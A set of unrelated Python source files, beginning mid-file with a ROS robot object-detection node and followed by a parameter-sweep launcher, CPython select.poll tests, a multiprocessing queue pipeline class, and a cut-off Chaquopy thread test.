self.darknet_config_dir+"yolov4-tiny-obj_last.weights" random.seed(3) # deterministic bbox colors self.network, self.class_names, self.class_colors = darknet.load_network( self.config_file, self.data_file, self.weights, batch_size=1 ) self.bridge = CvBridge() self.listener = tf.TransformListener() self.object_pose = [0,0,0,0] self.cloud_points = [] # PUBLISHERS self.detect_pub = rospy.Publisher('/detected_object', String, queue_size=10) self.visualize_detect_pub = rospy.Publisher('/visualize_pointcloud', PointCloud2, queue_size=10) self.object_pc_pub = rospy.Publisher("crop_pointcloud", PointCloud2, queue_size=10) self.cloud_index_pub = rospy.Publisher("gpd_cloud_indexed", CloudIndexed, queue_size=10) # The following ones are unusued for now self.cropped_depth_image_pub = rospy.Publisher("cropped_depth_image", Image, queue_size=10) self.cropped_rgb_image_pub = rospy.Publisher("cropped_rgb_image", Image, queue_size=10) self.cropped_camera_info = rospy.Publisher("cropped_camera_info", CameraInfo, queue_size=10) # SUBSCRIBERS self.image_sub = message_filters.Subscriber('/hsrb/head_rgbd_sensor/rgb/image_rect_color', Image) self.pointcloud_sub = message_filters.Subscriber('/hsrb/head_rgbd_sensor/depth_registered/rectified_points', PointCloud2) self.depth_sub = message_filters.Subscriber('/hsrb/head_rgbd_sensor/depth_registered/image_rect_raw', Image) def continuous_node(self): # publisher_thread = Thread(target=self.object_thread) # publisher_thread.start() ts = message_filters.TimeSynchronizer([self.image_sub, self.pointcloud_sub, self.depth_sub], 10) ts.registerCallback(self.callback) rospy.loginfo("Launching Detection Node") rospy.spin() #publisher_thread.join() def service_node(self): s = rospy.Service('object_detection', object_detection, self.handle_object_detection) rospy.loginfo("Object Detection Service Node: Waiting for Request...") rospy.spin() def handle_object_detection(self, req): return self.main_loop() def detect_dummy_object(): image_data = rgbd.get_image() points_data = rgbd.get_points() h_image = rgbd.get_h_image() rgbd.set_h(130, 140) region = rgbd.get_region() interact(f, lower=(0, 255, 5), upper=(0, 255, 5)) def main_loop(self): image_sub = rospy.wait_for_message('/hsrb/head_rgbd_sensor/rgb/image_rect_color', Image) pointcloud_sub = rospy.wait_for_message('/hsrb/head_rgbd_sensor/depth_registered/rectified_points', PointCloud2) depth_sub = 
rospy.wait_for_message('/hsrb/head_rgbd_sensor/depth_registered/image_rect_raw', Image) image_name = self.bridge.imgmsg_to_cv2(image_sub) image, detections = self.image_detection(image_name, self.network, self.class_names, self.class_colors) darknet.print_detections(detections, False) # Uncomment to visualize detection in real time (ressource consuming) # cv2.imshow('Inference', image) # cv2.waitKey(1) detected_obj = {} points = [] point_clouds = [] labels = [] bounding_boxes = [] threshold = 40.0 for obj in detections: if (float(obj[1]) > threshold): #Check if the confidence is above a threshold labels.append(String(obj[0])) x, y, w, h = obj[2][0], obj[2][1], obj[2][2], obj[2][3] boundingbox = BoundingBoxCoord() x_min, y_min, x_max, y_max = self.convertBack(x,y,w,h) boundingbox.x_min, boundingbox.y_min, boundingbox.x_max, boundingbox.y_max = (Int64(x) for x in self.convertBack(x,y,w,h)) bounding_boxes.append(boundingbox) points.append([int(x), int(y)]) #pc = self.crop_object_pointcloud(x_min, y_min, x_max, y_max, [x,y], pointcloud_sub) #point_clouds.append(pc) if not labels: final_msg = DetectedObj() final_msg.object_names = [String("nothing")] return final_msg poses = self.estimate_pose(points, pointcloud_sub) print(points) obj_poseXYZ = [] for pos in poses: temp = Pose() temp.position.x = pos[0] temp.position.y = pos[1] temp.position.z = pos[2] obj_poseXYZ.append(temp) fields = [PointField('x', 0, PointField.FLOAT32, 1), PointField('y', 4, PointField.FLOAT32, 1), PointField('z', 8, PointField.FLOAT32, 1), ] header = Header() header.stamp = rospy.Time.now() poses_msg = pc2.create_cloud(header, fields, poses) self.visualize_detect_pub.publish(poses_msg) final_msg = DetectedObj() final_msg.object_names = labels final_msg.objects_bb = bounding_boxes final_msg.object_poses = poses_msg final_msg.cloud = pointcloud_sub final_msg.object_posesXYZ = obj_poseXYZ print(obj_poseXYZ) return final_msg def estimate_pose(self, points, pointcloud_sub): res = [] gen = pc2.read_points(pointcloud_sub, field_names=("x", "y", "z"), skip_nans=True, uvs=points) for p in gen: res.append(p) return res ######################################################## ### UNUSUED ### ######################################################## def crop_object_pointcloud(self, min_x, min_y, max_x, max_y, center_coord, pointcloud_sub): points = [] for i in range(min_x, max_x): for j in range(min_y, max_y): points.append([i, j]) center_coord = [int(round(center_coord[0])), int(round(center_coord[1]))] points = list(pc2.read_points(pointcloud_sub, field_names=("x", "y", "z", "rgb"), skip_nans=True, uvs=points)) center = list(pc2.read_points(pointcloud_sub, field_names=("x", "y", "z"), skip_nans=True, uvs=[center_coord, [0,0]]))[0] pcl_data = pcl.PointCloud_PointXYZRGB() pcl_data.from_list(points) objects_cloud = self.use_ransac(pcl_data) colorless_cloud = XYZRGB_to_XYZ(objects_cloud) clusters = self.clustering(colorless_cloud) # # Get groups of indices for each cluster of points # # Each group of points belongs to the same object # # This is effectively a list of lists, with each list containing indices of the cloud # #clusters = self.get_clusters(colorless_cloud, tolerance = 0.05, min_size = 100, max_size = 1000) final_points = [] # r = randint(0, 255) # g = randint(0, 255) # b = randint(0, 255) # No clustering if there is only one cluster for speedup if len(clusters) == 1: final_points = np.array(objects_cloud) else: # We get the points belonging to each clusters # Two methods: # 1. 
Get the cluster where the center point of the bounding box belong # 2. Get the biggest size cluster (most likely the object) method = "2" # Method 1 if method == "1": pt_index = "" center = [round(x) for x in center] colorless_cloud_round = [] for pt in colorless_cloud: pt_round = [round(x) for x in pt] colorless_cloud_round.append(pt_round) for i in range(len(colorless_cloud_round)): if center == colorless_cloud_round[i]: pt_index = i for cluster in clusters: if pt_index in cluster: for c, i in enumerate(cluster): x, y, z, rgb = objects_cloud[i][0], objects_cloud[i][1], objects_cloud[i][2], objects_cloud[i][3] final_points.append([x, y, z, rgb]) break # Method 2 else: max_size = 0 max_cluster = [] for cluster in clusters: if len(cluster) > max_size: max_cluster = cluster max_size = len(cluster) for c, i in enumerate(max_cluster): x, y, z, rgb = objects_cloud[i][0], objects_cloud[i][1], objects_cloud[i][2], objects_cloud[i][3] final_points.append([x, y, z, rgb]) # fields = [PointField('x', 0, PointField.FLOAT32, 1), # PointField('y', 4, PointField.FLOAT32, 1), # PointField('z', 8, PointField.FLOAT32, 1), # PointField('rgba', 16, PointField.FLOAT32, 1), # ] # header = pointcloud_sub.header # pc_msg = pc2.create_cloud(header, fields, final_points) # pc_msg.header.stamp = rospy.Time.now() # return pc_msg #self.object_pc_pub.publish(pc_msg) clusters_cloud = pcl.PointCloud_PointXYZRGB() clusters_cloud.from_list(final_points) objects_msg = pcl_to_ros(clusters_cloud) return objects_msg def use_ransac(self, points): fil = points.make_passthrough_filter() fil.set_filter_field_name("z") fil.set_filter_limits(0, 1.5) cloud_filtered = fil.filter() seg = cloud_filtered.make_segmenter_normals(ksearch=100) seg.set_optimize_coefficients(True) seg.set_model_type(pcl.SACMODEL_NORMAL_PLANE) seg.set_normal_distance_weight(0.1) seg.set_method_type(pcl.SAC_RANSAC) seg.set_max_iterations(100) seg.set_distance_threshold(0.01) indices, model = seg.segment() object_cloud = cloud_filtered.extract(indices, negative=True) #table_cloud = cloud_filtered.extract(indices, negative=False) return object_cloud def object_thread(self): rate = rospy.Rate(100) # ROS Rate at 100Hz while not rospy.is_shutdown(): # fields = [PointField('x', 0, PointField.FLOAT32, 1), # PointField('y', 4, PointField.FLOAT32, 1), # PointField('z', 8, PointField.FLOAT32, 1), # PointField('rgb', 16, PointField.FLOAT32, 1), # ] # header = Header() # header.stamp = rospy.Time.now() # header.frame_id = "head_rgbd_sensor_rgb_frame" # pc_msg = pc2.create_cloud(header, fields, self.object_pose) # self.object_pc_pub.publish(pc_msg) min_x, min_y, max_x, max_y = self.object_pose points = [] for i in range(min_x, max_x): for j in range(min_y, max_y): points.append(int(i + (j*640))) self.listener.waitForTransform('/map', '/head_rgbd_sensor_rgb_frame', rospy.Time(), rospy.Duration(2.0)) (trans,rot) = self.listener.lookupTransform('/map', '/head_rgbd_sensor_rgb_frame', rospy.Time(0)) point_msg = Point() point_msg.x = trans[0] point_msg.y = trans[1] point_msg.z = trans[2] cloud_source_msg = CloudSources() cloud = rospy.wait_for_message('/hsrb/head_rgbd_sensor/depth_registered/rectified_points', PointCloud2) cloud_source_msg.cloud = cloud cloud_source_msg.camera_source = [int(1)] cloud_source_msg.view_points = [point_msg] cloud_index_msg = CloudIndexed() cloud_index_msg.cloud_sources = cloud_source_msg cloud_index_msg.indices = points self.cloud_index_pub.publish(cloud_index_msg) rate.sleep() def callback(self, image_sub, pointcloud_sub, depth_sub): image_name = 
self.bridge.imgmsg_to_cv2(image_sub) image, detections = self.image_detection(image_name, self.network, self.class_names, self.class_colors) darknet.print_detections(detections, False) #cv2.imshow('Inference', image) #cv2.waitKey(1) detected_obj = {} points = [] if detections: x, y, w, h = detections[1][2][0], detections[1][2][1], detections[1][2][2], detections[1][2][3] x_start, y_start, x_end, y_end = self.convertBack(x,y,w,h) # depth_im = self.crop_image(x_start, y_start, x_end, y_end, self.bridge.imgmsg_to_cv2(depth_sub, "16UC1")) # rgb_img = self.crop_image(x_start, y_start, x_end, y_end, self.bridge.imgmsg_to_cv2(image_sub, "bgr8")) # rgb_msg = self.bridge.cv2_to_imgmsg(rgb_img, "bgr8") # depth_msg = self.bridge.cv2_to_imgmsg(depth_im, "16UC1") #publish camera info topic on the new size # camera_info_msg = rospy.wait_for_message("/hsrb/head_rgbd_sensor/depth_registered/camera_info", CameraInfo) # camera_info_msg.width = w # camera_info_msg.height = h # camera_info_msg.header = std_msgs.msg.Header() # camera_info_msg.header.stamp = rospy.Time.now() # self.cropped_depth_image_pub.publish(depth_msg) # self.cropped_rgb_image_pub.publish(rgb_msg) # self.cropped_camera_info.publish(camera_info_msg) #self.create_cloud_indexed(x_start, y_start, x_end, y_end, pointcloud_sub) #self.crop_pointcloud(x_start, y_start, x_end, y_end, [x,y], pointcloud_sub) # self.object_pose = [x_start, y_start, x_end, y_end] # self.cloud_points = pointcloud_sub msg = self.create_cloud_indexed([x_start, y_start, x_end, y_end], pointcloud_sub) rospy.wait_for_service('/detect_grasps_server/detect_grasps') grasp_service = rospy.ServiceProxy('/detect_grasps_server/detect_grasps', detect_grasps) try: resp = grasp_service(msg) except rospy.ServiceException as exc: print("Service did not process request: " + str(exc)) print(resp.grasp_configs.grasps[0]) for obj in detections: x, y, w, h = obj[2][0], obj[2][1], obj[2][2], obj[2][3] points.append([int(x), int(y)]) poses = self.estimate_pose(points, pointcloud_sub) fields = [PointField('x', 0, PointField.FLOAT32, 1), PointField('y', 4, PointField.FLOAT32, 1), PointField('z', 8, PointField.FLOAT32, 1), ] header = pointcloud_sub.header pc_msg = pc2.create_cloud(header, fields, poses) pc_msg.header.stamp = rospy.Time.now() self.visualize_detect_pub.publish(pc_msg) i = 0 for obj in detections: detected_obj[obj[0]] = poses[i] i = i+1 detected_obj_msg = json.dumps(detected_obj) self.detect_pub.publish(detected_obj_msg) if not detected_obj and time_elapsed >= 10: return False # for obj in detected_obj: # br = tf.TransformBroadcaster() # br.sendTransform(detected_obj[obj], tf.transformations.quaternion_from_euler(0, 0, 0), rospy.Time.now(), obj, 'head_rgbd_sensor_rgb_frame') def crop_pointcloud(self, min_x, min_y, max_x, max_y, center_coord, pointcloud_sub): points = [] for i in range(min_x, max_x): for j in range(min_y, max_y): points.append([i, j]) points = list(pc2.read_points(pointcloud_sub, field_names=("x", "y", "z", "rgb"), skip_nans=True, uvs=points)) # fields = [PointField('x', 0, PointField.FLOAT32, 1), # PointField('y', 4, PointField.FLOAT32, 1), # PointField('z', 8, PointField.FLOAT32, 1), # PointField('rgb', 16, PointField.FLOAT32, 1), # ] # header = Header() # pc_msg = pc2.create_cloud(header, fields, points) # pc_msg.header.stamp = rospy.Time.now() # pc_msg.header.frame_id = "head_rgbd_sensor_rgb_frame" self.object_pose = points #self.object_pc_pub.publish(pc_msg) def clustering(self, cloud): # vg = cloud.make_voxel_grid_filter() # vg.set_leaf_size(0.01, 0.01, 0.01) # 
cloud_filtered = vg.filter() # nr_points = cloud_filtered.size # print(nr_points) # Creating the KdTree object for the search method of the extraction tree = cloud.make_kdtree() ec = cloud.make_EuclideanClusterExtraction() ec.set_ClusterTolerance (0.005) ec.set_MinClusterSize (10) ec.set_MaxClusterSize (1000) ec.set_SearchMethod (tree) cluster_indices = ec.Extract() #print('cluster_indices : ' + str(cluster_indices[0])) return cluster_indices # This pipeline separates the objects in the table from the given scene def split_cloud(self, cloud): # Downsample the cloud as high resolution which comes with a computation cost downsampled_cloud = do_voxel_grid_filter(point_cloud = cloud, LEAF_SIZE = 0.01) # Get only information in our region of interest as we don't care about the other parts filtered_cloud = do_passthrough_filter(point_cloud = downsampled_cloud, name_axis = 'z', min_axis = 0.6, max_axis = 1.1) # Separate the table from everything else table_cloud, objects_cloud = do_ransac_plane_segmentation(filtered_cloud, max_distance = 0.01) return objects_cloud, table_cloud # This pipeline returns groups of indices for each cluster of points # Each cluster of indices is grouped as belonging to the same object # This uses DBSCAN Algorithm Density-Based Spatial Clustering of Applications with noise # Aka Eucledian clustering to group points def get_clusters(self, cloud, tolerance, min_size, max_size): tree = cloud.make_kdtree() extraction_object = cloud.make_EuclideanClusterExtraction() extraction_object.set_ClusterTolerance(tolerance) extraction_object.set_MinClusterSize(min_size) extraction_object.set_MaxClusterSize(max_size) extraction_object.set_SearchMethod(tree) # Get clusters of indices for each cluster of points, each cluster belongs to the same object # 'clusters' is effectively a list of lists, with each list containing indices of the cloud clusters = extraction_object.Extract() return clusters def image_detection(self, image, network, class_names, class_colors, thresh=0.25): # Darknet doesn't accept numpy images. 
# Create one with image we reuse for each detect # width = darknet.network_width(network) # height = darknet.network_height(network) width = 640 height = 480 height = darknet.network_height(network) darknet_image = darknet.make_image(width, height, 3) image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image_resized = cv2.resize(image_rgb, (width, height), interpolation=cv2.INTER_LINEAR) darknet.copy_image_from_bytes(darknet_image, image_resized.tobytes()) detections = darknet.detect_image( network, class_names, darknet_image, thresh=thresh) darknet.free_image(darknet_image) image = darknet.draw_boxes(detections, image_resized, class_colors) return cv2.cvtColor(image, cv2.COLOR_BGR2RGB), detections def convertBack(self, x, y, w, h): xmin = int(round(x - (w / 2))) xmax = int(round(x + (w / 2))) ymin = int(round(y - (h / 2))) ymax = int(round(y + (h / 2))) return xmin, ymin, xmax, ymax def crop_image(self, min_x, min_y, max_x, max_y, image): image_cropped = image[min_y:max_y, min_x:max_x] return image_cropped def get_depth(self, x, y): gen = pc2.read_points(self.pc, field_names='z', skip_nans=False, uvs=[(x, y)]) return next(gen) def create_pointcloudXYZRGB(self, rgb_img, depth_im, camera_info): self.depth = img.frombytes("F", (depth_im.width, depth_im.height), depth_im.data) lookup_depth = self.depth.load() points = [] self.model.fromCameraInfo(camera_info.data) for i in range(depth_im.width): for j in range(depth_im.heigth): depth = lookup_depth[i, j] ray = self.model.projectPixelTo3dRay(tuple([i,j])) ray_z = [el / ray[2] for el in ray] # normalize the ray so its Z-component equals 1.0 pt = [el * depth for el in ray_z] # multiply the ray by the depth; its Z-component should now equal the depth value points.append(pt) fields = [PointField('x', 0, PointField.FLOAT32, 1), PointField('y', 4, PointField.FLOAT32, 1), PointField('z', 8, PointField.FLOAT32, 1), ] header = Header() header.stamp = rospy.Time.now() header.frame_id = "head_rgbd_sensor_rgb_frame" self.object_pc_pub = point_cloud2.create_cloud(header, fields, points) self.object_pc_pub.header.stamp = rospy.Time.now() pub.publish(self.object_pc_pub) def compute_box_coordinates(self, x1, y1, w_size, h_size): x_top_left = int(round(x1 - (w_size/2))) y_top_left = int(round(y1 - (h_size/2))) x_bottom_right = int(round(x_start + w_size)) y_bottom_right = int(round(y_start + h_size)) x_top_right = x_bottom_right y_top_right = y_top_left x_bottom_left = x_top_left y_bottom_left = y_bottom_right return [(x_top_left, y_top_left), (x_top_right, y_top_right), (x_bottom_right, y_bottom_right), (x_bottom_left, y_bottom_left)] if __name__ == "__main__": obj_detection_node = ObjectsDetection() # Here you can switch between two mode: # 1. Continuous detection by ROS subscriber/callback (asynchronous) # 2. Synchronous detection via ROS Service (Server/Client-like) #obj_detection_node.continuous_node() obj_detection_node.service_node()
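convertBack above turns Darknet's centre/width/height boxes into corner coordinates. A small self-contained check of that conversion, using a made-up detection tuple in the same (label, confidence, (x, y, w, h)) shape that detect_image returns:

def center_to_corners(x, y, w, h):
    """Convert a centre-based box (x, y, w, h) to (xmin, ymin, xmax, ymax)."""
    xmin = int(round(x - (w / 2)))
    xmax = int(round(x + (w / 2)))
    ymin = int(round(y - (h / 2)))
    ymax = int(round(y + (h / 2)))
    return xmin, ymin, xmax, ymax


# A fabricated detection in Darknet's output shape: (label, confidence, bbox).
detection = ("cup", 87.3, (320.0, 240.0, 60.0, 100.0))
x, y, w, h = detection[2]
print(center_to_corners(x, y, w, h))   # (290, 190, 350, 290)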
PT_KP.py
from itertools import product
import os
import threading
import time


def thread_function(conf):
    time.sleep(1)
    print(conf)
    os.system(f"Python ./RunInstance.py {' '.join(map(str, conf.values()))}")


parameters = {"Method": ["average", "extreme"],
              "W": [5, 25],
              "Pmin": [0.1, 0.2],
              "Alpha": [0.1, 0.5, 0.9]}

configurations = [dict(zip(parameters, v)) for v in product(*parameters.values())]

for c in configurations:
    x = threading.Thread(target=thread_function, args=(c,))
    x.start()
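Starting one unjoined thread per configuration works for a small grid, but a bounded pool keeps the number of concurrent RunInstance.py processes under control. A sketch with concurrent.futures, assuming the same (hypothetical) RunInstance.py command-line interface:

import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor
from itertools import product

parameters = {"Method": ["average", "extreme"], "W": [5, 25],
              "Pmin": [0.1, 0.2], "Alpha": [0.1, 0.5, 0.9]}
configurations = [dict(zip(parameters, v)) for v in product(*parameters.values())]


def run_instance(conf):
    # Launch the experiment script with the configuration values as arguments.
    cmd = [sys.executable, "./RunInstance.py"] + [str(v) for v in conf.values()]
    return subprocess.run(cmd).returncode


with ThreadPoolExecutor(max_workers=4) as pool:
    return_codes = list(pool.map(run_instance, configurations))
print(return_codes)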
test_poll.py
# Test case for the os.poll() function import os import subprocess import random import select import threading import time import unittest from test.support import TESTFN, run_unittest, reap_threads, cpython_only try: select.poll except AttributeError: raise unittest.SkipTest("select.poll not defined") def find_ready_matching(ready, flag): match = [] for fd, mode in ready: if mode & flag: match.append(fd) return match class PollTests(unittest.TestCase): def test_poll1(self): # Basic functional test of poll object # Create a bunch of pipe and test that poll works with them. p = select.poll() NUM_PIPES = 12 MSG = b" This is a test." MSG_LEN = len(MSG) readers = [] writers = [] r2w = {} w2r = {} for i in range(NUM_PIPES): rd, wr = os.pipe() p.register(rd) p.modify(rd, select.POLLIN) p.register(wr, select.POLLOUT) readers.append(rd) writers.append(wr) r2w[rd] = wr w2r[wr] = rd bufs = [] while writers: ready = p.poll() ready_writers = find_ready_matching(ready, select.POLLOUT) if not ready_writers: raise RuntimeError("no pipes ready for writing") wr = random.choice(ready_writers) os.write(wr, MSG) ready = p.poll() ready_readers = find_ready_matching(ready, select.POLLIN) if not ready_readers: raise RuntimeError("no pipes ready for reading") rd = random.choice(ready_readers) buf = os.read(rd, MSG_LEN) self.assertEqual(len(buf), MSG_LEN) bufs.append(buf) os.close(r2w[rd]) ; os.close( rd ) p.unregister( r2w[rd] ) p.unregister( rd ) writers.remove(r2w[rd]) self.assertEqual(bufs, [MSG] * NUM_PIPES) def test_poll_unit_tests(self): # returns NVAL for invalid file descriptor FD, w = os.pipe() os.close(FD) os.close(w) p = select.poll() p.register(FD) r = p.poll() self.assertEqual(r[0], (FD, select.POLLNVAL)) with open(TESTFN, 'w') as f: fd = f.fileno() p = select.poll() p.register(f) r = p.poll() self.assertEqual(r[0][0], fd) r = p.poll() self.assertEqual(r[0], (fd, select.POLLNVAL)) os.unlink(TESTFN) # type error for invalid arguments p = select.poll() self.assertRaises(TypeError, p.register, p) self.assertRaises(TypeError, p.unregister, p) # can't unregister non-existent object p = select.poll() self.assertRaises(KeyError, p.unregister, 3) # Test error cases pollster = select.poll() class Nope: pass class Almost: def fileno(self): return 'fileno' self.assertRaises(TypeError, pollster.register, Nope(), 0) self.assertRaises(TypeError, pollster.register, Almost(), 0) # Another test case for poll(). This is copied from the test case for # select(), modified to use poll() instead. 
def test_poll2(self): cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done' proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, bufsize=0) proc.__enter__() self.addCleanup(proc.__exit__, None, None, None) p = proc.stdout pollster = select.poll() pollster.register( p, select.POLLIN ) for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10: fdlist = pollster.poll(tout) if (fdlist == []): continue fd, flags = fdlist[0] if flags & select.POLLHUP: line = p.readline() if line != b"": self.fail('error: pipe seems to be closed, but still returns data') continue elif flags & select.POLLIN: line = p.readline() if not line: break self.assertEqual(line, b'testing...\n') continue else: self.fail('Unexpected return value from select.poll: %s' % fdlist) def test_poll3(self): # test int overflow pollster = select.poll() pollster.register(1) self.assertRaises(OverflowError, pollster.poll, 1 << 64) x = 2 + 3 if x != 5: self.fail('Overflow must have occurred') # Issues #15989, #17919 self.assertRaises(ValueError, pollster.register, 0, -1) self.assertRaises(OverflowError, pollster.register, 0, 1 << 64) self.assertRaises(ValueError, pollster.modify, 1, -1) self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64) @cpython_only def test_poll_c_limits(self): from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX pollster = select.poll() pollster.register(1) # Issues #15989, #17919 self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1) self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1) self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1) self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1) @reap_threads def test_threaded_poll(self): r, w = os.pipe() self.addCleanup(os.close, r) self.addCleanup(os.close, w) rfds = [] for i in range(10): fd = os.dup(r) self.addCleanup(os.close, fd) rfds.append(fd) pollster = select.poll() for fd in rfds: pollster.register(fd, select.POLLIN) t = threading.Thread(target=pollster.poll) t.start() try: time.sleep(0.5) # trigger ufds array reallocation for fd in rfds: pollster.unregister(fd) pollster.register(w, select.POLLOUT) self.assertRaises(RuntimeError, pollster.poll) finally: # and make the call to poll() from the thread return os.write(w, b'spam') t.join() @unittest.skipUnless(threading, 'Threading required for this test.') @reap_threads def test_poll_blocks_with_negative_ms(self): for timeout_ms in [None, -1000, -1, -1.0, -0.1, -1e-100]: # Create two file descriptors. This will be used to unlock # the blocking call to poll.poll inside the thread r, w = os.pipe() pollster = select.poll() pollster.register(r, select.POLLIN) poll_thread = threading.Thread(target=pollster.poll, args=(timeout_ms,)) poll_thread.start() poll_thread.join(timeout=0.1) self.assertTrue(poll_thread.is_alive()) # Write to the pipe so pollster.poll unblocks and the thread ends. os.write(w, b'spam') poll_thread.join() self.assertFalse(poll_thread.is_alive()) os.close(r) os.close(w) def test_main(): run_unittest(PollTests) if __name__ == '__main__': test_main()
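Outside the test harness, the core select.poll workflow these tests exercise is short: register a file descriptor, poll with a timeout, and read the (fd, eventmask) pairs that come back. A minimal sketch (POSIX only, since select.poll is not available on Windows):

import os
import select

r, w = os.pipe()
poller = select.poll()
poller.register(r, select.POLLIN)

print(poller.poll(0))        # [] -- nothing readable yet, 0 ms timeout

os.write(w, b"ping")
events = poller.poll(1000)   # [(r, select.POLLIN)] once data is buffered
for fd, mask in events:
    if mask & select.POLLIN:
        print(os.read(fd, 4))    # b'ping'

poller.unregister(r)
os.close(r)
os.close(w)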
main.py
import logging from multiprocessing import JoinableQueue, Manager, Process, Queue from multiprocessing.managers import SyncManager from typing import Callable, Iterable, List, Union from .constants import QueueFlags, QueueNames logger = logging.getLogger('QueueAutomator') class QueueAutomator: """ QueueAutomator is a wrapper that provides an easy to use API to build queue multiprocessing pipelines Example: >>> automator = QueueAutomator() >>> >>> @automator.register_as_worker_function(output_queue_name='queue', process_count=2) >>> def do_work(item): >>> ... >>> >>> @automator.register_as_worker_function(input_queue_name='queue', process_count=2) >>> def do_work_2(item): >>> ... >>> >>> if __name__ == '__main__': >>> automator.set_input_data([...]]) >>> results = automator.run() """ def __init__(self, name: Union[str, None] = None) -> 'QueueAutomator': self.__queue_table: dict = { QueueNames.OUTPUT: { 'target': None, 'process_count': None, 'worker_function': None }, } self.input_data = None self.name = name or '' def __repr__(self) -> str: return f'QueueAutomator[{self.name}]' def __validate_non_empty_args(self, args: list): for arg in args: if not args: raise ValueError(f'{arg} should not be empty or zero') def __build_queue(self, name: str, target: str, process_count: int, worker_function: Callable) -> dict: return { name: { 'target': target, 'process_count': process_count, 'worker_function': worker_function } } def __generate_queues(self, queues: list, manager: SyncManager, name: str): if name == QueueNames.OUTPUT: self.__queue_table[name]['queue'] = manager.Queue(0) return if name not in self.__queue_table: raise RuntimeError(f'{name} does not exist in queue map, register a worker function with input_queue_name={name}') current_queue = self.__queue_table[name] if current_queue.get('queue'): raise RuntimeError(f'{name} was already created, you may be creating a circular pipeline') next_queue = current_queue['target'] current_queue['queue'] = manager.JoinableQueue() queues.append((name, next_queue)) return self.__generate_queues(queues, manager, next_queue) def __enqueue_input_data(self): input_queue = self.__queue_table[QueueNames.INPUT].get('queue') if not input_queue: RuntimeError('enqueue_items was called before input queue was initialized, this should not happen') if not self.input_data: RuntimeError('input_data is empty, no data to process') for item in self.input_data: input_queue.put(item) def _process_enqueued_objects(self, in_queue: JoinableQueue, out_queue: Queue, worker_function: Callable): while True: input_object = in_queue.get() if input_object != QueueFlags.EXIT: result = worker_function(input_object) out_queue.put(result) in_queue.task_done() else: in_queue.task_done() logger.debug('_>>> Done <<<_') return def __spawn_processes(self, in_queue_name: str, out_queue_name: str) -> List[Process]: in_queue = self.__queue_table[in_queue_name] out_queue = self.__queue_table[out_queue_name] target = self._process_enqueued_objects process_list = list() for _ in range(in_queue['process_count']): process = Process(target=target, args=(in_queue['queue'], out_queue['queue'], in_queue['worker_function'])) process.start() process_list.append(process) logger.debug(f'Started {process.name} for queue {in_queue_name}') return process_list def __join_processes(self, process_list: list): for process in process_list: process.join() def __signal_queue_exit(self, queue: JoinableQueue, num_processes: int): for _ in range(num_processes): queue.put(QueueFlags.EXIT) def __recover_from_queue(self, 
queue: Queue, manager=False) -> list: results = [] while not queue.empty(): results.append(queue.get()) if manager: queue.task_done() return results def set_input_data(self, input_data: Iterable): """ This function is used to set the data to be processed in the pipeline Args: input_data (Iterable) """ self.input_data = input_data def register_as_worker_function(self, input_queue_name: str = QueueNames.INPUT, output_queue_name: str = QueueNames.OUTPUT, process_count: int = 1) -> Callable: """ Decorator to register your functions to process data as part of a multiprocessing queue pipeline Args: input_queue_name (str, optional): The name of the input queue for this function. Defaults to 'input'. output_queue_name (Union[str, None], optional): the name of the output queue for this function. Defaults to None. process_count (int, optional): The ammount of processes to listen to the given input queue. Defaults to 1. Raises: RuntimeError: If input_queue_name is already registered, use unique names ValueError: If input_queue_name is none or process_count is <= 0 Returns: Callable: The wrapped function after registering it. """ self.__validate_non_empty_args((input_queue_name, process_count, output_queue_name)) if input_queue_name in self.__queue_table: raise RuntimeError(f'{input_queue_name} already exists in queue table, pick another name') if process_count < 0: raise ValueError('process_count cannot be a negative number') def store_in_queue_table_wrapper(func: Callable) -> Callable: self.__queue_table.update( self.__build_queue(input_queue_name, output_queue_name or QueueNames.OUTPUT, process_count, func) ) return func return store_in_queue_table_wrapper def run(self) -> list: """ Is the main entry point to execute your program with a multiprocessing queue pipeline. To use it you need to register at least 1 worker function Do not forget to call set_input_data(Iterable) before calling run() Returns: list: The output as a simple python list """ manager = Manager() queues = [] self.__generate_queues(queues, manager, QueueNames.INPUT) process_per_queue = tuple((input_queue, self.__spawn_processes(input_queue, output_queue)) for input_queue, output_queue in queues) self.__enqueue_input_data() for queue_name, procesess in process_per_queue: current_queue = self.__queue_table[queue_name] current_queue['queue'].join() self.__signal_queue_exit(current_queue['queue'], current_queue['process_count']) self.__join_processes(procesess) return self.__recover_from_queue(self.__queue_table[QueueNames.OUTPUT]['queue'], True)
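_process_enqueued_objects above is the classic poison-pill worker: consume from a JoinableQueue, forward results, and exit when a sentinel arrives. A stripped-down sketch of that pattern on its own, with a hypothetical squaring step standing in for the registered worker function:

from multiprocessing import JoinableQueue, Process, Queue

SENTINEL = None


def worker(in_queue, out_queue):
    while True:
        item = in_queue.get()
        if item is SENTINEL:
            in_queue.task_done()
            return
        out_queue.put(item * item)     # stand-in for the real worker function
        in_queue.task_done()


if __name__ == '__main__':
    in_queue, out_queue = JoinableQueue(), Queue()
    processes = [Process(target=worker, args=(in_queue, out_queue)) for _ in range(2)]
    for p in processes:
        p.start()

    for item in range(10):
        in_queue.put(item)
    in_queue.join()                    # wait until every item is task_done()

    for _ in processes:
        in_queue.put(SENTINEL)         # one poison pill per worker
    for p in processes:
        p.join()

    results = [out_queue.get() for _ in range(10)]
    print(sorted(results))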
test_thread.py
import _thread

from java import detach, jclass
from time import time, sleep
from threading import Thread

from .test_utils import FilterWarningsCase
from com.chaquo.python import TestThread as JavaTestThread
from java.lang import String


class TestThread(FilterWarningsCase):

    def test_gil_release_method(self):
        self.check_gil_release(JavaTestThread.BlockingMethods.blockStatic)
        self.check_gil_release(JavaTestThread.BlockingMethods().blockInstance)

    def test_gil_release_constructor(self):
        self.check_gil_release(JavaTestThread.BlockingConstructor)

    def check_gil_release(self, blocking_func):
        self.assertFalse(JavaTestThread.blocked)
        delay = 0.1
        deadline = time() + (delay * 2)
        thread = Thread(target=blocking_func, args=[int(delay * 1000)])
        thread.start()

        while not JavaTestThread.blocked:  # Thread not started yet
